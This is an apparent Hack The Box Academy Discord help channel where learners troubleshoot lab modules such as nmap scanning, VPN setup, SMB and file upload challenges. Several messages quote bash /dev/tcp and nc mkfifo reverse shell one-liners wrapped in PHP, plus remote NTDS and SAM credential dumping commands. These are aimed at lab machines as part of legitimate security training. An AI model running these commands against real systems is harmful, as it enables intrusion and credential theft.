Some of those password attacks took a very long time.

Thank lord cuz its 7am haven't slept all night

Happier days will come. I've overcome the password attacks module, for a while it's cruise before the AD module

Does anybody need an extra in their group for CTF events etc. (B.S in Cybersecurity, Security+, & currently focusing on more Linux/Python and CYSA+) clearly focused more on the defensive side but want to work more on the offensive side 🧐

Guys I found this in Task scheduling section of the LInux fundamentals module, is this a mistake from HTB or I am looking it the wrong way

Cleanup DB

0 0 * * 0 /path/to/scripts/clean_database.sh
The third task, Cleanup DB, is to be executed every Sunday at midnight. This is specified by the entries 0 and 0 in the minute and hour columns and 0 in the days-of-the-week column. The task is executed by the clean_database.sh script, whose path is given in the last column.

Backups

0 0 * * 7 /path/to/scripts/backup.sh
The fourth task, backups, is to be executed every Sunday at midnight. This is indicated by the entries 0 and 0 in the minute and hour columns and 7 in the days-of-the-week column. The task is executed by the backup.sh script, whose path is given in the last column.

is Sunday is 0 in first one then why is it 7 in second one

Sunday is 0 or 7

Perhaps it's stated like that to make you look in to the documentation and understand that fact

Hello everyone, anyone completed Dog HTB Machine

#1347991714480128173

• #welcome to verify your account

#welcome

How can i get invite link to forun.hackthebox.com?

The forums are no longer supported, and are in read only mode.

It’s sad, cuz i can’t to find any answer on my question(
Thx

Ask your question here

OR in the relevant channel

Note, that you will not always get an answer, or nudge

<@&861185840277487616>

Can anyone give a hint on the last question for AD Trust Attacks SA?

Hello!! I am working on the Windows File Transfer Methods module "https://academy.hackthebox.com/module/24/section/160", and doing some tests I am having different "errors", when using PowerShell DownloadString I am getting blocked by the antivirus, that is fair enought, but when using Invoke-WebRequest is telling me that the remote host could not be resolved, can anyone tell me why? I just copied the instruction and I also tried a different github url, but same result

Hey everyone, I'd like some help with the getting started module, specifically the public exploits section. So, the basis for the lab is to use web enumeration and metasploit to capture the flag on the target. Here has been my process thus far:

• run: nmap -sV [target ip]
• when I did this the first time, it returned that nginx was running on an open port. Seeing how nginx has several vulnerabilities I figured that was the key and loaded it into metasploit
• metasploit couldn't launch the exploit saying that the service was unresponsive
• I went back to nmap and ran the command again and now the only services found are rcpbind and openssh, neither of which seem to have viable exploits
• I tried resetting the instance and the target, but nginx never shows up again.

Is this a bug? Or, is rcpbind or openssh the true path to solving this?

I believe this module/section only gives you one port, is that correct? If a skill assessment only gives you one port, that's the port you should focus on.

I would reset the box if the scan is showing different results from before

Also try browsing to it as well as nmap scan

There is no need to nmap scan. There is only one port running a web service, if you navigate to the page it should be very obvious what you should search an exploit for.

Ah, ok

Thanks guys

The only caveat you may need to know is use http:// instead of https://

Hey everyone! 👋

I’m new to cybersecurity and just beginning my journey. I transitioned from the medical field after 12 years because I wasn’t happy in my career. After taking a career assessment, I scored high for a career in IT, which really motivated me to make the switch!

I have some prior experience with tech—I took an elective in Python programming back in college, and I’ve also completed IT and Network Fundamentals courses. Last week, I officially decided to pursue cybersecurity, and I’ll be starting my Bachelor’s in IT in April 2025!

Right now, I’m diving into HTB Academy, but I’m not sure where to start. Should I begin with the Skill Path or the Job Role Path first? Any advice from those who’ve been through it would be greatly appreciated!

Looking forward to learning with you all! 🚀

If you know linux/windows fundamentals I'd start on the job role path.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks

hey i was trying to setup my own environment with htb, and i have everything installed correctly i think, but when i try to link my htb account, i get this error message. if anyone can help it would be greatly appreciated. thanks

Uhh, that's not how you link an account

You're trying to initiate a conda environment, but are prefixing the command with CyberApocalypse@htb[/htb]$

Did you paste the right screenshot?

well maybe i'm missing something.. https://academy.hackthebox.com/module/292/section/3290 this is where i'm at, i followed all the windows installation instructions

Oh, sorry I've not worked on that module

Hopefully someone can advise / nudge

and then when i go down to the init section, is kind of where i'm lost at

..but yeah, you are pasting more than you need to

The command you want to run is just like "conda init"

well it's the beginning of the module where it's telling me how to setup my own environment

without what looks like a bash prompt before it

how do i set it up to where i have my htb account instead of my C:>?

That's just bash profile customisation

It's not linking your account

ohhh\

It's just an example of how the bash shell would look under the Pwnbox

Anyway, not done that module, so others may be of more help 🙂

thanks for the help! \

you want it to look like this?

you may not be able to get it to do EXACTLY that but if you're interesting in customizing your prompt string, look into powershell and/or linux promptstring ($PS1 i think is the env var in linux) customizations. if you use kali, look into p10k theme for zsh it has a wizard for customizing PS1

yo i didnt know where to ask because i dont have access to general but where can i find my account identifier

Yes it so great to here let to it

app.hackthebox.com right? then go to your account settings -> security settings ->

@unique spruce ^

i did that

i linked my thing

pretty sure it should kick over

still hasnt

ok so you linked it but you cant leave #module to go to #general or anything?

https://app.hackthebox.com/profile/settings

thans

Very big on the right hand side

log out of htb and quit discord, restart log back in first, then launch discord

i was on the little thing inbetween labs and academy

thats weird, why isnt that piece in the security settings where the discord link is?

or at least a link to in that security settings section that takes you to the link you posted

Cos linking discord on that isnt fully integrated yet

oic

Cant post in erratum for some reason but there is a typo in Info gathering - web edition | Subdomain Bruteforcing where the bash code for dnsenum uses a different wordlist than the one being referred to prior and afterward... harmless but bugs me for some reason lol

#1234357888114364508

Literally if you read the first four words

I typed up a whole thing but everytime I try to post it just returns "Error"

Get verified, instructions ---> #welcome

why

:( man im too lazy for that right now

Hey guys, I’m pissed cus I’m so close to finishing the CBBH path, but stuck on the last section for Hacking Wordpress skills assessments. Any tips on just the final question?

Please dont share skill assessment details, just wait for someone and take it to DMs (please remove last part of your message)

Sorry about that. Edited the message

Hey I'm working on the Skills Assessment for Intro to Assembly Language, Task 1. I have what I believe are the 14 pieces of the encoded shellcode, and have concatenated them in every way that I can think of. Would someone with experience in Assembly DM me please?? That would be awesome

can anyone give me a hand with Skills Assessment - File Upload Attacks? https://academy.hackthebox.com/module/136/section/1310

I have been able to get the source code for upload.php and identify the upload directory via svg.

being that I cant do anything else. I tried to read /flag.txt and /flag without success.... also unable to upload webshell to the uploads directory.

take a closer look at the functions; it's doing something to the uploaded filename 😉

you mean the whitelist and blacklist functions?

nope

you said you leaked the uploads.php; take a close look at what it does with the filename

if it helps run the code locally with php -r and replace the reference to the filename with a test name

@vague yoke my dms aren't open for module help; it should be fairly obvious, it's near the top of the file

hello

i am in Stack-Based Buffer Overflows on Linux x86 module

i have problem with the address

i dont know why 0xc2 is in my buffer

you code is throwing away results

Not to distract the question. But is this module good so far? I want to try it after CBBH

I realized that, which is why I captured them manually.

I don't want to spoil by listing out the values here, but assuming they are correct, I think my problem is with the concatenation, which I have been running with the python script "loader.py" from the module, which executes shellcode directly from hex.

sorry

its just intro

after this a want go to pwn.collage

I do challenges from there every now and then. It’s legit stuff

Any hints please?

@lost kiln intro to ASM is above tier 0 don't spoil code from the module

If it's above Tier 0, just.. don't post any specifics, at all

@vague yoke 🙂

all the tactics you need are covered by the module

I am stuck with this question

¯_(ツ)_/¯

take it one step at a time; maybe double extensions might be a way forward

I tried that too, but I will give it another shot.

thanks

to be clear: the results you get are -- only images allowed? or extension not allowed?

I got both depending on the test ....

well --> only images allowed is a key to move forward

:) don't forget about magic bytes

tried that too, GIF8 🙂

magic bytes must match extension + content-type

:P

During the skills assessment of SQLMap Essentials when i try to get information it comes blank why?

1:53:00] [INFO] retrieved:
[21:53:01] [CRITICAL] unable to retrieve the database names

Nevermind some tampering messed the output up
it worked just fine now

I give up for today. will try again tomorrow.

#welcome

#modules

do you need some help?

help pls

Ask your question by not postiong content from the module directly please, only tier 0 is allowed to be posted.

ohh

I need help but i dont want to give out information regarding how to solve target in the Getting Started Module...

You could post here and say what you're stuck on

well, yesterday i was having issues running an nmap scan on a target, unless I specified the port it never gave me any results on other open ports. so i search for exploits on the port that i did get results from and i did find some but none of them ar in metasploits and thats the whole idea of the module section. Not sure if I have to still try to run the exploits i found tho not related to what was taught in the module section?

Which section?

Public Exploits

If you notice on the target that spawns, it provides a port. Whenever you see that on the HTB Academy platform, that means it's only that port you have to worry about. Don't bother with nmap, just visit that IP and port in your browser. You can click on the IP and paste it into your browser's address bar. It should be pretty straight forward as to which public exploit to find after that 😉

really? ok Ill give it a go with that, thanks for your time.

this is information given in the Intro to Academy module btw about targets and how to interact with them

A break is really useful tomorrow you'll have a clear mind and ace the question

Hello! I'm new here. Anyone available to help me out with the linux fundamentals?

Hii, anyone interested in taking part in cyber apocalypse

#1336347627452629033

Be more specific, which section, what question?

my apologies. I'm on Linux fundamentals. System info. It asks for the htb-student's home directory? But as far as I've come to understand, I thought the tilde was the directory?

nope

~ is just the shorthand for the home directory

if you either pwd or echo $HOME you may find it more helpful, or running env to get a list of the environment variables

thank you @fathom pendant, i'm not sure why it doesn't like those answers

?

are you ssh to the target?

i believe so

pwnbox != target

spawn instance spawns pwnbox
spawn target spawns target

if your username is htb-ac-<numbers> then you're on the pwnbox, not ssh to the target

i ran out of time. i'm stressed out lol maybe i'll figure it out tomorrow. Thank you

ok so I found the exploit...but its not working...could it have been patched? (thats one of the suggestions i find online)

I'm stuck on DACL Attacks II Skills Assessment, 2nd flag. Hint is: Create and Link. I have access to the creator account. There are two linkers, but there are no ACL entries where any users I own have privileges over the linkers. I'm not sure how to move forward from here.

modules don't tend to get patched for the intended exploit path

they get patched for unintendeds if it massively bypasses the learning aspect

but the labs are usually well written

but it's not likely the intended exploit has been patched

it's a simple file read exploit; no RCE

thing is when looking for show actions there are none so i cant set one and if I dont the only thing it does is scan

?

did you search the plugin that's given on the webpage you're given?

or did you assume the target was gonna be SMB like the examples and are shooting yourself in the foot

I searched the Plugin I changed my target IP, the port and the file path to the flag and ran the exploit but it only scanned

did the output tell you it saved a file?

:P

no hehe

normally not open to dms but i wanna see where you fucked up

if anything try resetting the target and trying again

If it’s metasploit, the correct one is show options not show actions 🙂

just options not show options

Both works

yeah but who knows if they'll keep show as part of the syntax

but actions is empty

<actions> isn't valid :)

show actions*

dm me bc i wanna see what your options look like

still, not valid

DMed you some screenshots

Hi,

Module: Windows Privilege Escalation
Section: DnsAdmins
Section Link: https://academy.hackthebox.com/module/67/section/603

I managed to add netadm user to the Domain Admins group, which is shown when I run the net group command. But when I run the command whoami /groups , Domain Admins is not seen. Anyways, I tried to access the flag. But I am not allowed. Why?

Think of a way to refresh the current access token assigned to the user so it updates the privileges

it is something simple

what does this question expect?? nothing i enter seems to work (ping if you reply pls)

It expects numbers like the format shows

yh i tried that

6.11+parrot-amd64
is what uname -r gives me

/proc/version gives 6.11.5-1parrot1 @west rampart

You have the answer imo.

yh but it wont work

What did you try?

ive tried most combinations

6.11.5, 6.11.0, 6.11

Well what's your module?

linux fundamentakls

just lf a quick comp but this question stumped me

make sure you've connected to the target machine

Hey! I found a typo in Web Fuzzing module "Tooling" section. Should be "an" not "a". Someone can fix it?

That's the version on your pwn box, not the target.

i didnt get a target ip, this is the version of pwnbox uuname rettrns 6.11+parrot..

im under system information rn, didnt recieve a target ip

you need to spawn the target machine

those types of nuances are explained in the Intro to Academy module

ah can yo driect me to he section for target ip

oml my keyboard

oh tysm! i found the area. man now i feel blind

#1234357888114364508

Apologies, I posted this to the correct place now. Thank you!

idk why but reverse shell on Nibbles just aint working

I tried different technique

copied from youtubers and such

uploaded a php file, testing it out with just the id command, now I have nc -nvlp 4444 setup ready but when I use /bin/bash -i >& /dev/tcp/10.10.14.188/4444 0>&1 it doesnt work, I even tried replacing the "&" to %26, I tried other php reverse shells. What am I doing wrong?

probably some parsing issues, have you tried uploading the php file with the revshell command in it?

e.g

<?php system("<COMMAND HERE>")?>

yes I'm using : <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1888 4444>/tmp/f"); ?>

Anyone able to lend a hand with pivoting tunnelling and port forwarding module. Specifically web server pivoting with rpivot I'm not sure if it's buggy or I'm doing something wrong

hy i doing this module when i try to connect to ssh it connect and in next second it disconnet 😩
https://academy.hackthebox.com/module/297/section/3413

Have you tried running as sudo?
Do you have another ssh connection open at all?
Try including the password in the initial command in "quotes" see if that helps

still not connecting

Hey guys, hope yall are having a good day

Can someone please give me a clue or any help possible. I can't seem to get the answear right

https://academy.hackthebox.com/module/226/section/2416

Working with IDS/IPS -> Snort Rule Development -> keyword that should be specified right before the content keyword

Apreciate any help

can anyone check upon Nibbles, even on metasploit I can't even get a shell

That IP definitely doesn't exist , double check it

ye typo in discord, is 188 in kali

what about using the normal bash revshell payload?

Here's the specific one I used

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.87/9001 0>&1'")?>

#bloods ?? YOOO

What if I’m a crip

Hi beans, this isn't general ( #general ) this is #modules, for discussion about academy modules, please head over to the general channel instead to talk about off topic stuff

if you don't have access to the channel get verified, instructions here ---> #welcome

It's generally better to mention the module, section, and question rather than just the link so that it's easier to help you at a glance.

Have you tried: Restarting the target, Changing VPN regions, swapping to TCP vpn.

@waxen totem made that improvement, thanks

Thank you for the nudge! 🙂

Yeah I just tried again, and the creds I have don't work for ssh lol

what am i doing wrong here?

You didn’t add the port

În Host? I did that before chat gpt said it was wrong

Are u tryina sub domain enumerate ?

Dm the other command I think it might be something else

yo guys i need

help of course

im stuck on the last question in DNS in footpriting module

since like 3 hours

the question says: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

what i did so far:

i did a zone transfer on inlanefreight.htb and it showed some domains

i enumerated them all by DNS brute force, since none of them accepted zone transfer except for internal.inlanefreight.htb

only dev.inlanefreight.htb showed some sub domains, but enumerating them further showed none

i dont know what to do next

I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best :D

On my laptop it worked, but on my main desktop not very weird... maybe a setting in vmware?

parrot os security will work if ur just starting up

yes i understand that, im the exact thing of htb distro if possible, for example:

question: figure out what the group id of "alex" is

its going to range across systems and i need those question cause they help me learn best. Currently I have kali purple for small projects.

@leaden island ^^ :D

Yea vhost enumeration

Hi, I have a question.

I'm currently working on the Attacking FTP section in the Attacking Common Services module, but I can't seem to find any FTP service running on the target machine.

I already performed a full port scan, and these are the only open ports I can see:

└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 4000 --max-retries 2 -p- 
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:36 EDT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 08:36 (0:00:10 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds

Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"
Or is something wrong with my current setup?

Any advice would be really appreciated. Thanks!

└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 500 --max-retries 2 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:35 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.01% done; ETC: 08:38 (0:00:46 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63373 closed tcp ports (reset), 2158 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 147.52 seconds

Maybe try -sT with mentioning ports 21, 20 and then check

Windows Priv Esc / Windows Built-in Groups (SeBackup)

I got a question, here we learned about copying the registry hives and dump ntds.dit file right. i found quick win using crackmapexec like so:

nxc smb <ip-here> -u username -p password123 --ntds # for ntds.dit dump remotely

or --sam for registry gives

why don't they work in this specific section's machine?

• if i remember correctly the quick win was given in Windows Local Password Attacks in passwords attack module.

thanks

└─$ sudo nmap -sT 10.129.186.83 -p 21,20                                 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:48 EDT
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).

PORT   STATE  SERVICE
20/tcp closed ftp-data
21/tcp closed ftp

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds

I still can't see it.

Cause it's actually closed

Hi I am mounting a linux folder using xfreerdp "xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer", but I can't create or move files or folders on Windows while connecting remotely with xfreerdp, I don't have permissions, how can I solve this?

scan for all the ports

FTP might not be 21/20 if configured

Yea try -sT with all ports

└─$ sudo nmap -sT 10.129.186.83 -p- --min-rate 500 --max-retries 2 -Pn -n                                                                                                                  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:54 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.93% done; ETC: 08:56 (0:02:13 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63602 closed tcp ports (conn-refused), 1929 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 165.88 seconds

I still can not see it...

Windows Privilege Escalation Windows Server command is not executable in server didn't find vulnarabilities to exploit via msfconsole can someone assist?

sudo nmap -sV --script ftp-* -p 21,20,2121,990 10.129.186.83

try doing this

└─$ sudo nmap -sV --script ftp-* -p 21,20,2121,990 10.129.186.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 09:05 EDT
Nmap scan report for 10.129.186.83
Host is up (0.34s latency).

PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
990/tcp  closed ftps
2121/tcp closed ccproxy-ftp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds

Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"

im not sure

try reseting the machine

I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best. Ex: figure out what the group id of "alex" is. It's going to range across systems and i need those questions cause they help me learn best. Currently I have Kali Purple for small projects.

umm.. I already reset it three times...

what machine is this

let me check it out

HTB Academy - Attacking Common Services - Attacking FTP

better install kali on flash card and use your own kali connect via vpn and it will be better for you

ok

how am i supposed to ask a question when it keeps saying i can't ask the question?

yea but can't answer questions, (the little boxes down the bottom). for things like the example above. Currently I have a VPN w virtualbox kali

got any solutions

I have kali on vm and I am downloading vpn connection file and executing it with command openvpn Downloads/academy-regular.ovpn

and it connects me to htb

Constantly says:

This can't be posted because it contains content blocked by this server. This may also be viewed by server owners

ohh i didnt know they had a connection file?

nmap -sC -sV -p- 10.129.186.83 Try this @upbeat linden

yes search in it module there is a connection file down after the explanation section finishes

and i read you might need to reset the machine many times for the service to be up

scroll down and you will see it

so thatll connect me to a kali machine or..?

if so it means no more boot problems so yay

it will connect you to htb server and you can solve htb questions directly on your machine

you will in the upper right corner of you kali the connection mark it will be typically be something like 10.10.15.51

lock and cable mark

lock and cable?

i roughly described how it will look

Im currently doing some powershell stuff and im going insane. Im ssh'd into the VM and I can interact with the machine, however I can't install any PS modules, because the machine cannot connect to the internet. When I try and test the connection using a builtin powershell cmdlet using a well known domain, it errors out and says it cant resolve the domain. It also can't install anything from the powershell gallery which is the reason im running into this issue.
Anyone had a similar issue before or know whats wrong or have any suggestions please let me know.

ok ill grab that connection file

thank you

yes and execute it with command openvpn Downloads/academy-regular.ovpn

typically it is downloaded into downloads

but check the folder where the file is

yh i understand

sometimes it can be in different place

i dont rlly use openvpn much,

did it work brother ?

you will have to

weird.

it doesnt limit ur access to their server does it?

no

the access will be unlimited but you know target is limited usually

Also i have reset the machine already and that doesn't help

yh idm abt that, im still in fundamentals

ill pay for that stuff if need be later or use another service

the pwnbox is limited kali will be unlimited but target will be limited

something like that

Well... nmap is still running. If Nmap can't find the FTP service again, I'm planning to keep resetting the machine until it works.....

Like suggested in the module, wait 2 minutes after the box starts up and then verify that the FTP service is running.
Even if the nmap scan does not report anonymous login, it does not mean you can’t anonymously fetch files from the FTP server. There are plenty of good tips in here about this.

these are some comments i found that might help you

@cerulean herald ur profile made me laugh man, i love it

I don't understand TARGETURI, "The base path to the cms", what does Metasploit mean by that?

hahahahahaha

thankss

Actually, I already waited for over 10 minutes, but it still didn’t work. I’m just going to try harder.

thank you so much

is it slow? if so i feel you

for module/77/section/859, found it runs on GetSimple CMS 3.3.15, but when I run this, it says "target si not vulnerable"

@flint palm what page gives me the vpn. i cant find it for the life of me

Click on your profile then vpn settings

nvm found it i think

oh east

I use sudo -b then it runs in background

what does it mean by each time you "switch"?

Each time you switch the country you will need to generate a new file

also tcp or udp

Udp

ah i see

dang why is that

Yea choose the country closest to you

yea... only gives me us and eu

Yea i forgot it's not tryhackme

ah

yh im not rdy for tryhackme yet

well for fun only not for learning

Does the country I’m living in affect the lab environment by any chance?

i feel you

slower

They just have specific countries nothing much

same as a reg vpn

it may affect the connection

latency

dang

AS soon

hopefully

I guess you choose the recommended one then should have the lowest ping

i did that, eu recommended

can you get me the openvpn cmd rq?

Your on Windows?

kali

Then change directory to downloads on the termine

Or cd Downloads

i alr did that

Does anyone know if you get a certificate (not certification) of completiong for completing the Pentester Path? I want to get some CEUs

academy-regulr.ovpn

Then sudo -b openvpn whatever is the name of the file

do i have to run on each boot?

Yes

My vm is always active on my laptop I rarely boot

you get a badge, no certificate. you can share a link for the badge

pain, can i set it to boot on startup

im just using a seperate machine for it

you can with cronjobs I haven't tried it though

Ok, thank you. Just wondering how I would upload that to the CEU site. Would I need to take a screenshot of the course showing the amount of days and multiple by 8 hours in terms of hours of learning

you can get a copy of your transcript. i think that shows the modules you've completed and how long each one takes

should be in the HTB Academy account settings

THat's what I'll need. Awesome. I appreciate you

will this work for me?? chatgpt gave me it
sudo systemctl enable openvpn-client@academy-reular
sudo systemctl start openvpn-client@academy-reular

ignore spelling mistake

no

whats the problem w it

oh nvm

it doesnt realise i need to open it with openvpn

if you plan on doing this then it will be a bit annoying to switch VPNs whenever you need to

wait am i high

i dont have others on this vm, what other ones do you have (if you dont mind)

connecting to VPN is as simple as sudo openvpn /path/to/file.ovpn, i think it's better to just have it running in the background or in another virtual desktop

if for whatever reason your connection isn't the greatest and need to switch to a different VPN in your region or switch the layer 3 protocol

im rrnning this with htb vpn, i dont have any faster options 😭

you may also want to try out some of the machines on the main platform which requires another VPN file

that's why i say you're better off manually running the command and having it run in the background until you're done with Academy for the day

ssorry im a bit confused, wym

in order to interact with HTB's labs, you need to VPN into their network

yep i got that

you do that using VPN software (OpenVPN) and a VPN file provided by HTB (.ovpn)

yep

Academy and Labs use different VPN files

and you cannot connect to both at the same time

oh i see, i have only been using acaademy

what can i get out of labs?

using what you've learned in Academy to test vulnerable machines

Academy is guided learning, Labs is by yourself

at least for the active content you're by yourself

ohhh, as of now i will not be using labs. I've been using tryhackme and other services

or i had intended to, however im still working on fundamentals of linux

that's fine

wb man

Guys when I created msfvenom file for making reverse shell with windows using metasploit I set the port for 445 which is opened but when I used multi/handler it is trying to connect 4444 which is closed on that machine what to do?

you open the port

;-;

to open port you must have administrators right and I am not an administrator there!

so become an administrator

very limited privileges on the machine no possibility to become an administrator))

simply escalate privileges

hello everyone, where do I begin with htb?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thankiu 🙂

I'm doing the brute forcing module and it's asking me to install cupp, but i get this error on Kali, any advice?

try git clone https://github.com/Mebus/cupp.git

and dont forget to make it executable with chmod +x cupp.py

ty! 😄

hello im on the cpts path and im on the footprinting module dns and i keep getting nxdomain when i try to find the fqdn and i cant find the address ending in 203

would rly appreciate the help

I can't seem to connect to the windows server to test file permissions.
Module link: https://academy.hackthebox.com/module/49/section/1017
Section: Using smbclient to list available shares

I type this in > smbclient -L SERVER_IP -U htb-student replacing the server_ip with the ip used to access the windows through rdp. And i get > Connection to 10.129.62.123 failed (Error NT_STATUS_IO_TIMEOUT)

Try with this format ////TargetIp//

You can also specify the share your trying to access after "//" If anonymous log in is supported try the -N flag. Smbmap is better for file permissions

Hello everyone, wondering if I could discuss with someone the NMAP Hard-LAB. Just want to make sure I'm on the right track

like all I wanted to know is they are asking for one service or all the services

Still doesn't work, -N flag would be instead of the -L flag?

Also tried smbmap: smbmap -H 10.129.62.123 -u htb-student -p Academy_WinFun!

But doesn't detect hosts serving SMB

anyone have a good youtube video guide for "network enumeration with nmap" module?

So -L is to list the shares -N is anonymous login try again with the given username specify the port that the smb is running on also might help. If using passwords in your command make sure you put it between quotes having special characters like ! In there can through it off example -p 'password!23'

nvm figured it out

Anyone?

anyone help me with this query please 🙂

Hi everyone, anyone interested in helping me with the File Inclusion assessment? something does very wrong with the webshell injection and I can't for the life of me figure out what I'm doing wrong 🤦‍♀️

If i use -N it gives me unrecognized argument error. And if I don't use -N flag it still doesn't work, this is my code:

smbmap -L -H 10.129.201.57 -u htb-student -p 'Academy_WinFun!'

That was for smbclient -N

Make sure you include the port number that the smbclient is running on I'm pretty sure I had similar issues with this

Bro im doing dnd

Dns*

Hit by accident mate I'll look in my notes see if I have anything for you

With this one are you given the domain name and ipaddress and have you added this to the etc/hosts file

smbmap -L -H 10.129.201.57 -u htb-student -p 'Academy_WinFun!' -P 53 I got the port from doing netstat -tulpn and most where 53 but not sure if that is the way, because the smbmap still doesn't work

I did and I’got no answer

What module isit I'll jump on now and have a quick look

https://academy.hackthebox.com/module/49/section/1017 this one

NTFS vs. Share Permissions in the Windows Fundamentals

@round relic wait I might have found a solution on the htb forum

I had to turn off Windows firewall defender

Thank you for your help anyway @round relic

Hi everyone,
Currently I'm working on Firewall and IDS/IPS Evasion - Hard Lab section from the "Network enumeration with Nmap" module. I found the service, but after trying several firewall and IDS/IPS evasion techniques, I can't get the service version back (I performed a Ack Scan, I disabled ICMP Echo Request, DNS Resolution and ARP ping, I scan the target by using another IP address and from port 53 and I changed timing)
Can someone help me ?

Nice one mate always the same with these modules you'll try everything you can think of and waste hours if not days of time to find the answer staring you on the face

Have you tried -sVV flag with your scan

That or you try everything to realize you have a typo or used wrong ip😆

I've been there very recently. All i will say when copy and pasting back and forth between vms sometimes it will add in extra characters from what you copied

Yes but when I add the flag, the service becomes tcpwrapped

Hey 👋 I am new here, just getting into hack the box and learning about cyber security, trying to get into bug bounties and penetration testing.

@ashen light hi, nmap uses different scripts to bypass firewalls and IDS/IPS. you can find the official document here. https://nmap.org/nsedoc/

There is another tool that you can utilise for banner grabbing

Yes, I tried with netcat too, but It doesnt work

Try with sudo

Are you running the command as sudo

Hi everyone, I have problem with Cors misconfiguration, in Advanced XSS and csrf exploitation

will anyone help me please

Yes, but I have a timeout with netcat

DM

Are you using nc as apposed to ncat

I'm using nc, it's not the same ?

Nope diffrent versions I think try with ncat

And make sure your using sudo with this if your still having issues pm me

The hint provides the expected format for the answer

well judging from the hint that is the format just like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc

mybad just realized

in the windows fundamentals module, Operating System Structure, how do I get the actual GUI windows screen? Every time I try and spawn the windows target machine, it says LOGON FAILURE

Is anyone available to give me a hand in private with https://academy.hackthebox.com/module/136/section/1310 ? Skills Assessment - File Upload Attacks. I have spent several hours, done several things and I am still stuck. I can go through what I have done in details. I was able to get some aspects of my attack to work fine, but I can't reach the end goal. I would really apreciate if anyone can assist me with this as I am getting really frustrated and feel that either I am really close and missing something small or there is a problem in the lab. I worked on this question yesterday and today

anyone?

stuck on that too, trying different word lists

wordlists for what? for the extensions?

oh sorry that is for the dns

Hi im doing active directory enumeration & attacks > credentialed enumeration - from linux
When i try to run bloodhound i get an Error:"the futex facility returned an unexpected error code. Aborted"
What should i do?
EDIT: NEEDED TO RDP TO THE HOST

hi

is there anyone to help me with this ?

Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag. , Server-side Attacks
Page 3
Identifying SSRF
Identifying SSRF

I managed to find the ports and still have issues to access the machine to get the flag, the lesson doesn t give enough info

How did you find the port but can’t get access?

by using ffuz

but that doesn t help me that much how to undertand to get the access or the flag

Curl? Burpsuite?

To determine whether the HTTP response reflects the SSRF response to us, let us point the web application to itself by providing the URL http://127.0.0.1/index.php: this thing I don t undertand

I use burpsuite

But that’s not what they’re looking for

I did to find the ports , but I don t know what should I do next

Just curl it

It’s basically the same command with ffuf

what should I curl ?

Just like how you fuzzed it

I don t understand, you mean about ports?

Or capture the request burpsuite and change the port

Yes

I don t know how I should write the curl command

I tried this and got only this , ffuf -w ports.txt -u http://ip target:FUZZ -s -mc all
80

still didn t got enough info for the next step to understand how to get the access/flag

is there anyone who could help me with some more info ? :/ The lesson doesn t help me to get what should I do and I can t get further to understand what I do wrong

We can't offer assistance for such CTFs.

there is no one to help me ? :/ I tried also with chatgpt and no luck....

Did you fuzz the post request?

It’s just like the lesson

yes

and when I access it gives me an error that I cannot access

I also tried to curl all of them but nothing

Dm the command

Did you ever get passed the Skills Assessment? I'm currently stuck on Q2. I am able to edit the script and know who the GPO creators/linkers are. I don't know how to get to the GPO linker accounts.

Still got the issue to get the next step :/

Hi, i'm at the password attacks module, performing Pass the Ticket from Linux, im a bit confused on the chisel+proxychains thing so I need to know if what i understood is valid:
